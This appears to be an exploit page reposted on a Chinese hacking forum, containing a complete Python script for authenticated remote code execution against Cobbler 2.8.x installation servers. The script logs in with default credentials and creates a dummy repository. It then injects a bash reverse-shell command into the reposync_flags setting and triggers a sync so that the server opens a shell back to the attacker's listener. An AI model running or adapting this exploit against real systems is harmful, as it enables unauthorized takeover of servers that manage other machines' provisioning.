Cobbler 2.8.0 - (Authenticated) Remote Code Execution - 黑帽漏洞数据库

发布于2022年11月5日2年前
#!/usr/bin/python

"""
# Exploit title: Cobbler 2.8.x Authenticated RCE.
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com (@hack6tence)
# Date: 03-16-2017
# Vendor homepage: cobbler.github.io
# Software version: v.2.5.160805


Software Description
=====================
Cobbler is a Linux installation server that allows for rapid setup of network installation environments. It glues together and automates many associated Linux tasks so you do not have to hop between many various commands and applications when deploying new systems, and, in some cases, changing existing ones.
Cobbler can help with provisioning, managing DNS and DHCP, package updates, power management, configuration management orchestration, and much more.

Vulnerability Description
=========================
Authenticated RCE

"""
 
import uuid
import sys
import requests


# Custom variables
cobbler_server = 'http://192.168.2.235/cobbler_web/' 
cobbler_user = 'cobbler'
cobbler_pass = 'cobbler'
netcat_listener = '192.168.2.51/4444'


# Cobbler variables
cobbler_url = '%s/do_login' % cobbler_server
cobbler_settings_url = '%s/setting/save' % cobbler_server
cobbler_reposync = '%s/reposync' % cobbler_server
cobbler_reposave = '%s/repo/save' % cobbler_server
cobbler_repo_name = str(uuid.uuid4()).split('-')[0]



class Cobbler():
    def __init__(self):
        self.client = requests.session()
        self.client.get('%s' % cobbler_server)
        self.csrftoken = self.client.cookies['csrftoken']
        self.headers = dict(Referer=cobbler_url)
        self.login_data = dict(csrfmiddlewaretoken=self.csrftoken, next='/cobbler_web', username=cobbler_user, password=cobbler_pass)
        self.client.post(cobbler_url, data=self.login_data, headers=self.headers)

    def create_repo(self):
        print("Creating dummy repository...")
        self.repoinfo = dict(
            csrfmiddlewaretoken=self.csrftoken, 
            editmode='new', 
            subobject='False', 
            submit='Save', 
            arch='i386', 
            breed='yum', 
            comment='', 
            keep_updated='', 
            mirror='', 
            name=cobbler_repo_name, 
            owners='admin',
            rpm_list='',
            proxy='',
            apt_components='',
            apt_dists='',
            createrepo_flags='',
            environment='',
            mirror_locally='',
            priority='99',
            yumopts='')
        self.client.post(cobbler_reposave, data=self.repoinfo, headers=self.headers)

    def post_payload(self):
        print("Configuring reposync flags with the payload...")
        self.payload = dict(csrfmiddlewaretoken=self.csrftoken, editmode='edit', subobject='False', submit='Save', name='reposync_flags', value='-h; bash -i >& /dev/tcp/%s 0>&1 &' % netcat_listener)
        self.client.post(cobbler_settings_url, data=self.payload, headers=self.headers)

    def get_shell(self):
        self.create_repo()
        self.post_payload()
        print("Executing repository sync... expecting reverse shell. this may take a few seconds.")
        self.client.post(cobbler_reposync, data={'csrfmiddlewaretoken':self.csrftoken}, headers=self.headers)

if __name__ == '__main__':
    cobbler = Cobbler()
    cobbler.get_shell()
    sys.exit()
登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Cobbler 2.8.0 - (Authenticated) Remote Code Execution

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索
